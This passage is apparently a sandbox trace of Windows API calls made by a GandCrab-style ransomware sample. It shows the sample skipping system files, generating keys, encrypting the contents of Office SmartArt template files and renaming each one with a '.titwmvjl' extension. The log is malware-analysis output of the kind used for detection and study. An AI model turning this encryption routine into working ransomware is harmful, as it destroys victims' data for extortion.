phProv=0x259df00*=0x4cdb38) returned 1 [0078.443] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0078.444] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.444] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.444] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0078.444] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.444] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.444] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.444] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.445] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.447] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.448] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503838) returned 1 [0078.448] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.448] CryptGetKeyParam (in: hKey=0x503838, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.448] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.448] CryptEncrypt (in: hKey=0x503838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.448] GetLastError () returned 0x0 [0078.448] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.448] CryptDestroyKey (hKey=0x503838) returned 1 [0078.448] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.449] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.449] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.449] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.452] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.452] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5035b8) returned 1 [0078.452] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.452] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.452] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.452] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.453] GetLastError () returned 0x0 [0078.453] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.453] CryptDestroyKey (hKey=0x5035b8) returned 1 [0078.453] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.453] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.453] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0078.453] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0078.453] ReadFile (in: hFile=0x2ec, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259dfd0*=0x23e7, lpOverlapped=0x0) returned 1 [0078.464] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xffffdc19, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.464] WriteFile (in: hFile=0x2ec, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x23e7, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259dfb4*=0x23e7, lpOverlapped=0x0) returned 1 [0078.465] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.465] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0078.467] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.470] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.471] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.471] CloseHandle (hObject=0x2ec) returned 1 [0078.472] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328925[[fn=Interconnected Block Process]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328925[[fn=interconnected block process]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328925[[fn=Interconnected Block Process]].glox.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328925[[fn=interconnected block process]].glox.titwmvjl"), dwFlags=0x1) returned 1 [0078.473] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.473] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0078.473] lstrcmpW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2=".") returned 1 [0078.473] lstrcmpW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="..") returned 1 [0078.473] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328932[[fn=Picture Frame]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328932[[fn=Picture Frame]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328932[[fn=Picture Frame]].glox" [0078.473] lstrlenW (lpString=".titwmvjl") returned 9 [0078.473] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328932[[fn=Picture Frame]].glox") returned 139 [0078.473] VirtualAlloc (lpAddress=0x0, dwSize=0x156, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0078.473] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328932[[fn=Picture Frame]].glox.titwmvjl") returned 148 [0078.473] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328932[[fn=Picture Frame]].glox") returned 139 [0078.474] lstrlenW (lpString=".glox") returned 5 [0078.474] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.474] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".glox ") returned 6 [0078.474] lstrcmpiW (lpString1=".glox", lpString2=".titwmvjl") returned -1 [0078.474] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.474] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328932[[fn=Picture Frame]].glox") returned 139 [0078.474] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328932[[fn=Picture Frame]].glox") returned 139 [0078.474] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="desktop.ini") returned 1 [0078.474] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="autorun.inf") returned 1 [0078.474] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="ntuser.dat") returned 1 [0078.474] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="iconcache.db") returned 1 [0078.474] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="bootsect.bak") returned 1 [0078.474] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="boot.ini") returned 1 [0078.474] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="ntuser.dat.log") returned 1 [0078.474] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="thumbs.db") returned 1 [0078.474] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0078.474] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0078.475] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0078.475] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="CRAB-DECRYPT.html") returned 1 [0078.475] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0078.475] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0078.475] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="ntldr") returned 1 [0078.475] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="NTDETECT.COM") returned 1 [0078.475] lstrcmpiW (lpString1="TM03328932[[fn=Picture Frame]].glox", lpString2="Bootfont.bin") returned 1 [0078.475] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328932[[fn=Picture Frame]].glox") returned 139 [0078.475] lstrlenW (lpString=".glox") returned 5 [0078.475] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.475] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".glox ") returned 6 [0078.475] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.475] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.475] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328932[[fn=Picture Frame]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328932[[fn=picture frame]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0078.476] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.476] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0078.482] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.482] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.482] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.485] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0078.485] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.486] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.486] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0078.486] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.486] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.486] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.486] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.486] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.490] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0078.490] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.490] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.490] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0078.491] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.491] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.491] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.491] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.491] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.494] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.494] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503838) returned 1 [0078.495] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.495] CryptGetKeyParam (in: hKey=0x503838, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.495] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.495] CryptEncrypt (in: hKey=0x503838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.496] GetLastError () returned 0x0 [0078.496] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.496] CryptDestroyKey (hKey=0x503838) returned 1 [0078.496] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.496] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.496] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.497] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.500] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.500] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5037b8) returned 1 [0078.500] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.500] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.500] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.500] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.501] GetLastError () returned 0x0 [0078.501] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.501] CryptDestroyKey (hKey=0x5037b8) returned 1 [0078.501] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.501] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.501] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0078.501] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0078.502] ReadFile (in: hFile=0x2ec, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259dfd0*=0x10e6, lpOverlapped=0x0) returned 1 [0078.517] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xffffef1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.517] WriteFile (in: hFile=0x2ec, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10e6, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259dfb4*=0x10e6, lpOverlapped=0x0) returned 1 [0078.519] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.520] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0078.521] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.526] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.527] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.527] CloseHandle (hObject=0x2ec) returned 1 [0078.529] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328932[[fn=Picture Frame]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328932[[fn=picture frame]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328932[[fn=Picture Frame]].glox.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328932[[fn=picture frame]].glox.titwmvjl"), dwFlags=0x1) returned 1 [0078.530] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.530] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0078.530] lstrcmpW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2=".") returned 1 [0078.530] lstrcmpW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="..") returned 1 [0078.530] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328935[[fn=Picture Organization Chart]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328935[[fn=Picture Organization Chart]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328935[[fn=Picture Organization Chart]].glox" [0078.530] lstrlenW (lpString=".titwmvjl") returned 9 [0078.530] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328935[[fn=Picture Organization Chart]].glox") returned 152 [0078.531] VirtualAlloc (lpAddress=0x0, dwSize=0x170, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0078.531] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328935[[fn=Picture Organization Chart]].glox.titwmvjl") returned 161 [0078.531] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328935[[fn=Picture Organization Chart]].glox") returned 152 [0078.531] lstrlenW (lpString=".glox") returned 5 [0078.531] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.531] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".glox ") returned 6 [0078.531] lstrcmpiW (lpString1=".glox", lpString2=".titwmvjl") returned -1 [0078.531] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.532] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328935[[fn=Picture Organization Chart]].glox") returned 152 [0078.532] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328935[[fn=Picture Organization Chart]].glox") returned 152 [0078.532] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="desktop.ini") returned 1 [0078.532] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="autorun.inf") returned 1 [0078.532] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="ntuser.dat") returned 1 [0078.532] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="iconcache.db") returned 1 [0078.532] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="bootsect.bak") returned 1 [0078.532] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="boot.ini") returned 1 [0078.532] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="ntuser.dat.log") returned 1 [0078.532] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="thumbs.db") returned 1 [0078.532] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0078.532] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0078.532] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0078.532] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="CRAB-DECRYPT.html") returned 1 [0078.532] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0078.532] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0078.532] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="ntldr") returned 1 [0078.532] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="NTDETECT.COM") returned 1 [0078.532] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="Bootfont.bin") returned 1 [0078.532] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328935[[fn=Picture Organization Chart]].glox") returned 152 [0078.532] lstrlenW (lpString=".glox") returned 5 [0078.532] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.533] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".glox ") returned 6 [0078.533] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.533] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.533] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328935[[fn=Picture Organization Chart]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328935[[fn=picture organization chart]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0078.534] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.534] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0078.546] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.546] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.546] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.549] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0078.550] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.550] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.550] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0078.550] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 